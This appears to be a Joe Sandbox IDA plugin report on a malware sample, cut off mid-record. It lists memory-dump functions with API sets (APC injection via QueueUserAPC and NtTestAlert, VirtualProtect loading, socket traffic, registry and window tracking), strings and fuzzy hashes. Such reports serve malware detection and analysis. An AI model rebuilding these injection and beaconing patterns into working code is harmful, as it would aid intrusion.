                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Gdip$Image$free$Bitmap_errno$BitsGraphicsHeapPalette$AllocContextCreateDeleteDisposeDrawErrorFormatFreeFromHeightLastLockPixelScan0SizeUnlockWidth_callnewhmallocmemcpy_s
                          • String ID:
                          • API String ID: 1886978121-0
                          • Opcode ID: 283663abc3149b5c3ebf54f6b2f35572c17daa750bb804d3607567a51a1e62ec
                          • Instruction ID: 98190e041d91f5c19b3b17df2a0bfdf86573a3a6cf66777ee89843af6beeffbe
                          • Opcode Fuzzy Hash: 283663abc3149b5c3ebf54f6b2f35572c17daa750bb804d3607567a51a1e62ec
                          • Instruction Fuzzy Hash: 29C155722406C28AFB209F35D4C4BE937B7F754B98F45852ADA1A87B85DF38CA46C740

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateMutexSleep$ConsoleErrorHandleLastModuleWindowlstrcmplstrlen
                          • String ID: 2024. 6.19$key$open
                          • API String ID: 2230033419-3044968688
                          • Opcode ID: 99fa9ff8c4f67a4f69d89c190ec8d3bea25dab96d7079cc25afd004eccd381e5
                          • Instruction ID: 01e40f978d9ef0c80921b37cbe4f059e5142d21db0dcb39849b528eee11073fa
                          • Opcode Fuzzy Hash: 99fa9ff8c4f67a4f69d89c190ec8d3bea25dab96d7079cc25afd004eccd381e5
                          • Instruction Fuzzy Hash: 48310A31694AC782FB58AB25E895BDA33B3F794744F80943E954A425A5DF38CF4AC700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4113640461.00007FF6F6081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6F6080000, based on PE: true
                          • Associated: 00000000.00000002.4113613717.00007FF6F6080000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.4113640461.00007FF6F6089000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.4113640461.00007FF6F6362000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.4113640461.00007FF6F679E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff6f6080000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: Process$AddressAllocCurrentHandleMemoryModuleProcQueueUserVirtualWrite
                          • String ID: C:\Users\Public\Pictures\any.png$NtTestAlert$ntdll
                          • API String ID: 373793033-3820315678
                          • Opcode ID: f246ccdc4e2d5b1fd47c438f45d2eda0d8f7f9cd1ac1eb3c950f0c355d377293
                          • Instruction ID: dee6ad3edba44f311d45edd176e3c82856bbfd40af029f2973650630b19c8af7
                          • Opcode Fuzzy Hash: f246ccdc4e2d5b1fd47c438f45d2eda0d8f7f9cd1ac1eb3c950f0c355d377293
                          • Instruction Fuzzy Hash: AF416362A18B4281EB40DB75E5443696369FF88BE0F605235EAAD53BF4EE7ED4818700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$_errno$CloseEnumInfoOpenQuery_invalid_parameter_noinfo
                          • String ID: Software\Tencent\Plugin\VAS
                          • API String ID: 47975445-3343197220
                          • Opcode ID: 6e061b802c5184f6ffb8d5e46668b4594c4fe4b6239176f7fbc9992a5fd39cfc
                          • Instruction ID: 2787a4e3cd5b5551586d1334af0b45850a457ca8bdfc8eb8addf31d67a3db36f
                          • Opcode Fuzzy Hash: 6e061b802c5184f6ffb8d5e46668b4594c4fe4b6239176f7fbc9992a5fd39cfc
                          • Instruction Fuzzy Hash: CC517236654BD285F720DB25E890BDE73B6F784748F50112ADA8D47A68DF38CB46CB40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Window$CountForegroundInfoInputLastTextTickmallocwsprintf
                          • String ID: %d min
                          • API String ID: 4179731349-1947832151
                          • Opcode ID: 9b22214b862d139c1bff70a84ba118025456f4720a884c79d0e9ae2e001336b0
                          • Instruction ID: 1d0b25fe7401a3f08d995adefc0fee2952d6a2f24d146df43539a0bb4c246429
                          • Opcode Fuzzy Hash: 9b22214b862d139c1bff70a84ba118025456f4720a884c79d0e9ae2e001336b0
                          • Instruction Fuzzy Hash: A041A0322446D186FB649F25E494BDAB773F785B84F44413ADE4A47B85DB38CE06CB10
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$OpenQueryValuelstrcmp
                          • String ID:
                          • API String ID: 4288439342-0
                          • Opcode ID: 6a09b4fa8d1f1f673de0ef9cf23ec804b22330cdbe4280648003b7661aad5db0
                          • Instruction ID: c9a5b0ccc7acd8205837f34a341d84df750aadbd4e4dcaab0f5380f890a806df
                          • Opcode Fuzzy Hash: 6a09b4fa8d1f1f673de0ef9cf23ec804b22330cdbe4280648003b7661aad5db0
                          • Instruction Fuzzy Hash: 1E319131358AC181FB60DB15E8C4B9AB372F7D5B94F401239AA5D43B99DF39CA46CB04
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateErrorLastThread_errno_getptd_invalid_parameter_noinfofree
                          • String ID:
                          • API String ID: 3283625137-0
                          • Opcode ID: 72025f16065156c1a411d32745b6a8ceab2b3ea3d3236370eb3e3b3478fac157
                          • Instruction ID: 4b75fc62a2158abce137ca205ed582f5f2eda2c306d0a0ebd8231fe16fe4b698
                          • Opcode Fuzzy Hash: 72025f16065156c1a411d32745b6a8ceab2b3ea3d3236370eb3e3b3478fac157
                          • Instruction Fuzzy Hash: EE216D352407D186FA14AB66E841BDAB3B3B784BA0F445639AF6943796CF38CA528700
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _errno$recvselect
                          • String ID:
                          • API String ID: 4102763267-0
                          • Opcode ID: 9845bbeb49fb392f0077708386112e1cb0e8a4c98ec056f0ebe1f442da0f05b8
                          • Instruction ID: 664a0e798b5f04a61102ebf797919f7716a55c80de6406fa78aca3e3c9533773
                          • Opcode Fuzzy Hash: 9845bbeb49fb392f0077708386112e1cb0e8a4c98ec056f0ebe1f442da0f05b8
                          • Instruction Fuzzy Hash: A43110B0258A848FF7A5EF28C495BAA73E6FF84305F1C467DA44BC7192DB348D428746
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: CreateThread_errno_getptd_invalid_parameter_noinfofree
                          • String ID:
                          • API String ID: 2643549960-0
                          • Opcode ID: a6b047b9ba05778c913bae5aa75a3fa791de028973cf7ce0c6a1d43e90da30c7
                          • Instruction ID: 23f5d76224ffe9b6c26a84966cbed2f4b0f56de1e3b714d084caadf0691140b2
                          • Opcode Fuzzy Hash: a6b047b9ba05778c913bae5aa75a3fa791de028973cf7ce0c6a1d43e90da30c7
                          • Instruction Fuzzy Hash: 5C218C30248B494FFB44BB68D456BAA77E5EF94310F18063EA45EC32A3DB60DD428792
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEnumInfoQueryValue_callnewhmallocstd::exception::exception
                          • String ID: t1:
                          • API String ID: 1242514309-2900936606
                          • Opcode ID: fede6cdfeb807d385ee5abbfcf2e1eb580fa302d2ae75469db10d5a0f1743a1d
                          • Instruction ID: 3272456a813a4d2b01304d3e8b2b48808432ec3700241a932da8f278aa45085f
                          • Opcode Fuzzy Hash: fede6cdfeb807d385ee5abbfcf2e1eb580fa302d2ae75469db10d5a0f1743a1d
                          • Instruction Fuzzy Hash: 38916C32741B8189EB40DF69E894B9973B6F788794F11413AAA5D87BA4DF34CA52C300
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: OpenQueryValue
                          • String ID: Console$IpDatespecial
                          • API String ID: 4153817207-1840232981
                          • Opcode ID: 22fc0a0dece14184706e6fb6e5bb7c82227ebf9c7fbc1b7f67f3996ba3476d1f
                          • Instruction ID: 81e4fd21d15a3af9ecdd3d183c772c3fb12f702d94dd46edfb3f01074707e2a1
                          • Opcode Fuzzy Hash: 22fc0a0dece14184706e6fb6e5bb7c82227ebf9c7fbc1b7f67f3996ba3476d1f
                          • Instruction Fuzzy Hash: F221A432648AD199F3209BA1E480BDD7776F34879CF844126DE8C13A98DB38C65AC704
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112008325.000001CFB9300000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9300000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ProtectVirtual$LibraryLoad
                          • String ID:
                          • API String ID: 895956442-0
                          • Opcode ID: 48f3a983b865309274dfddc27b08f5c66236fb7a43ce97e016cebd4c856a8b9f
                          • Instruction ID: 93da2f63c02c1300ea4fcb21a34ad9b197faaa0477af91c1116ddcd5e1ba186d
                          • Opcode Fuzzy Hash: 48f3a983b865309274dfddc27b08f5c66236fb7a43ce97e016cebd4c856a8b9f
                          • Instruction Fuzzy Hash: 8B31B63130CA184BE758AA5CD8457FA73EAEBC4321F18413DA84BC72D6DE60DE0746C1
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandleProcess$FileImageNameOpen
                          • String ID:
                          • API String ID: 93767460-0
                          • Opcode ID: e5835fa6602d2fc698d6210b0ee50ff401511b4d9772e348674df1cf25f15e26
                          • Instruction ID: f47f5164d5f692e18bbe98eb26f78260f4bd33ade4ea423158c4bda0f2fa9760
                          • Opcode Fuzzy Hash: e5835fa6602d2fc698d6210b0ee50ff401511b4d9772e348674df1cf25f15e26
                          • Instruction Fuzzy Hash: C41184753546C281FF249B25E4D879A62B3BB98BC4F44403E8E4947386EF3CCA46C700
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CancelEventclosesocketsetsockopt
                          • String ID:
                          • API String ID: 852421847-0
                          • Opcode ID: 652c7e3dd81a5322d9837539c46bb1ede8e7bbe065106b81e455553d895865ab
                          • Instruction ID: 0b23eb3cb3c52e9bd3409543aea26d9ecad7711a67d48cea0e6a6d3c510f93dd
                          • Opcode Fuzzy Hash: 652c7e3dd81a5322d9837539c46bb1ede8e7bbe065106b81e455553d895865ab
                          • Instruction Fuzzy Hash: 2FF03C36201AC1C3E7249F25E55879AB332F785BA4F60433ADBA907BE4CF39C5668701
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: Sleep$_errno$_invalid_parameter_noinfomalloc
                          • String ID:
                          • API String ID: 3746343157-0
                          • Opcode ID: a0bf53fd14b18baa06dae27eec97fe0d1a6922e2a394531e4f28ced092993dc4
                          • Instruction ID: 64b23afb6dd4bba10de44fa948927357136ff99c4deeede422d3597ba9333265
                          • Opcode Fuzzy Hash: a0bf53fd14b18baa06dae27eec97fe0d1a6922e2a394531e4f28ced092993dc4
                          • Instruction Fuzzy Hash: FA715F312546498FF754EF28D895BE977A6FB89300F58452EE44BC31A2DB38DE42C782
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: Value$DeleteOpen
                          • String ID:
                          • API String ID: 821670891-0
                          • Opcode ID: 5b51d0f07fe2ec2a12fe00e65f7005416d701acb93c52f3d52654ca2c179eb4d
                          • Instruction ID: 23b183deb0cd08d989852096b653ae418e16cec97732cf8baa8a0b2e77119578
                          • Opcode Fuzzy Hash: 5b51d0f07fe2ec2a12fe00e65f7005416d701acb93c52f3d52654ca2c179eb4d
                          • Instruction Fuzzy Hash: B9313E306487488FF748EB28D858BDA77E6FF84345F584A2DE156C22A4DB38C985CB41
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4113640461.00007FF6F6081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF6F6080000, based on PE: true
                          • Associated: 00000000.00000002.4113613717.00007FF6F6080000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.4113640461.00007FF6F6089000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.4113640461.00007FF6F6362000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.4113640461.00007FF6F636B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.4113640461.00007FF6F679E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff6f6080000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: __scrt_acquire_startup_lock__scrt_get_show_window_mode__scrt_release_startup_lock
                          • String ID:
                          • API String ID: 1152625263-0
                          • Opcode ID: 61287d11c25f32e521161f209feba58a36412df61d1ac03f0bb13480fc72a213
                          • Instruction ID: e50d4d6f512934eff736806c8e7b319826e98d95d9daa145d5dbdc6909f6153a
                          • Opcode Fuzzy Hash: 61287d11c25f32e521161f209feba58a36412df61d1ac03f0bb13480fc72a213
                          • Instruction Fuzzy Hash: CB416820E0C64341FB58EBB5A6523B92289AFD1344F685435DA7EC72F3FE6FA8458301
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalSection$EnterGdiplusLeaveStartup
                          • String ID:
                          • API String ID: 389129658-0
                          • Opcode ID: 33b4bd6e2f87f441e3fd96ec6b98b4ecf2029651f8cca78304b2f89041d54879
                          • Instruction ID: d045182b68ae283567d840be811d266e9d96c8c73bcbf4cf2e286fb110a7f44d
                          • Opcode Fuzzy Hash: 33b4bd6e2f87f441e3fd96ec6b98b4ecf2029651f8cca78304b2f89041d54879
                          • Instruction Fuzzy Hash: ED011A35548BC382FB449F15E9807D973B7F7A0745F84412AD586425A4CF7CCA5ACB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112008325.000001CFB9300000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9300000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: LibraryLoad
                          • String ID: l
                          • API String ID: 1029625771-2517025534
                          • Opcode ID: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
                          • Instruction ID: f9abdee970300a051bfe49d4d337b643c96764b205d409c2dc0e270cb449ac9e
                          • Opcode Fuzzy Hash: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
                          • Instruction Fuzzy Hash: BF319030558AD58FF795DB28C048B66BBE9FFA9308F2856BC90DAC71A2D720D9078701
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocLibraryLoadVirtual
                          • String ID:
                          • API String ID: 3550616410-0
                          • Opcode ID: 22a59f860d870a6bcf201ec3191bb530606b5caa03c236b8628a20c22f198a64
                          • Instruction ID: a9380a58562cd1c127dec311cf09ed45d6d0ef8b85a371664be19f28d08e0e13
                          • Opcode Fuzzy Hash: 22a59f860d870a6bcf201ec3191bb530606b5caa03c236b8628a20c22f198a64
                          • Instruction Fuzzy Hash: 86C1E334294A4A8BEB689E68C9C4BB5B3E1FB55301F14413DD88AC3285EB74ED92C7D1
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: send
                          • String ID:
                          • API String ID: 2809346765-0
                          • Opcode ID: e5b400f1e4516aa0803fed4f772d5bd127400e170aad474a78b21ea62f3b727e
                          • Instruction ID: 81fc3fcae6218fa73c49dedffcf286af3f969f9d1bf2827c0f44c5dc7452ed30
                          • Opcode Fuzzy Hash: e5b400f1e4516aa0803fed4f772d5bd127400e170aad474a78b21ea62f3b727e
                          • Instruction Fuzzy Hash: BB210832640AC242F3604B12F8C4F9A76B2F798BD8F04113AEF1943B91E775C9438308
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112008325.000001CFB9300000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9300000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9300000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ProtectVirtual$LibraryLoad
                          • String ID:
                          • API String ID: 895956442-0
                          • Opcode ID: 59fb7dff92b0f7852036e505a9d953d2edd625376deed43e8a97f635c863a1ff
                          • Instruction ID: 3d19a9cf5b630499a95d16716c89753d7244cc6b655eabde962a81af49a42544
                          • Opcode Fuzzy Hash: 59fb7dff92b0f7852036e505a9d953d2edd625376deed43e8a97f635c863a1ff
                          • Instruction Fuzzy Hash: 3C11AC31358A584BDB94EB18D485BBA73E5FFD8340F18457DAC4AC7255DF20DE428781
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: CreateHeapfree
                          • String ID:
                          • API String ID: 2345683253-0
                          • Opcode ID: 1de35667c4491ff6d1491348858e0d4b0818fad769f9b683ab588cdfd6fe5441
                          • Instruction ID: 2a3fc90452aaa157d4c6fdbfec6b9e10f6af05aad1c335ce5f56b88048700977
                          • Opcode Fuzzy Hash: 1de35667c4491ff6d1491348858e0d4b0818fad769f9b683ab588cdfd6fe5441
                          • Instruction Fuzzy Hash: 471113B0918A188FEB94DF18D4C47517BE9EF48704F6445AEA909CB25AC770C982CBC0
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: Thread$CreateMessagePost_wcsrev
                          • String ID:
                          • API String ID: 4143106411-0
                          • Opcode ID: 152ae417eb4b62f33c842a60702934fe7b1e65802cfc5c2bd98c8d5dbe26bc31
                          • Instruction ID: 644c876923fc3839e3081e635f1a6e119649b2cc86a67ef9779c126950a60409
                          • Opcode Fuzzy Hash: 152ae417eb4b62f33c842a60702934fe7b1e65802cfc5c2bd98c8d5dbe26bc31
                          • Instruction Fuzzy Hash: FB015E707145058FE728EF74EC5D1797BE2FB89312B41863AA457C29B0DF384501AA42
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateHeapfree
                          • String ID:
                          • API String ID: 2345683253-0
                          • Opcode ID: 2e347fcba473973204389cff578f1acf52d540e9d7daa0cdd23c5056874622e4
                          • Instruction ID: 9d9def22907ed83a69a16c5995359aecff173e859daabc987558a1e77cb2bf66
                          • Opcode Fuzzy Hash: 2e347fcba473973204389cff578f1acf52d540e9d7daa0cdd23c5056874622e4
                          • Instruction Fuzzy Hash: A1117CB25217A0C6F744CF28E48074937BAF748F48F25512AEB4957758CB78C882CB80
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: closesocketsetsockopt
                          • String ID:
                          • API String ID: 553142124-0
                          • Opcode ID: 77c2693313518921cd1b9c8efffd3d9e865a5c66b2e60eb56a87be25d9ebaed2
                          • Instruction ID: b6a2d4a08e4454521ba372f46659c5deb02d7b25398f81e5b88216843b30245d
                          • Opcode Fuzzy Hash: 77c2693313518921cd1b9c8efffd3d9e865a5c66b2e60eb56a87be25d9ebaed2
                          • Instruction Fuzzy Hash: 5F016D70218A458FE744DF68D848B96B7B1FF88315F50432CE15EC72A0CB399851CB82
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: SleepTimetime
                          • String ID:
                          • API String ID: 346578373-0
                          • Opcode ID: 77ee5b6c6589e47e27a32890b617e9f8f43f170f7971284fab1d9a22a6fd6b20
                          • Instruction ID: 0366515f04396daf1f795fe5a3331b6d2afb58c076d7cdbcb15862639839c492
                          • Opcode Fuzzy Hash: 77ee5b6c6589e47e27a32890b617e9f8f43f170f7971284fab1d9a22a6fd6b20
                          • Instruction Fuzzy Hash: 0A01D8326046C187F7648B24D2C4BAC3773F348B45F000239C75603AD0CB78CAA6C705
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateObjectSingleThreadWait
                          • String ID:
                          • API String ID: 1891408510-0
                          • Opcode ID: 7b0bb7bbe43155a50ef1fbcb0573ed9ed8b30bcd02ad1d16f7930aff955f32ce
                          • Instruction ID: 1a29e55741400fa244ce2a8a784ce43b754cc4e6b02f395edd03a1b006118207
                          • Opcode Fuzzy Hash: 7b0bb7bbe43155a50ef1fbcb0573ed9ed8b30bcd02ad1d16f7930aff955f32ce
                          • Instruction Fuzzy Hash: 8EE0ED31D45AC286FB619B74EC45BC532F3F795328F90523E9499422A4EF3CCA568644
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: 94c7016ab2636b5593df99f46c9914e648a045f6aa69c007a8dbfde07d768e9c
                          • Instruction ID: 3724752795a1d1267f686d2e9d5378f2a3140d69735bbc6a8b51b58cfc26dfa1
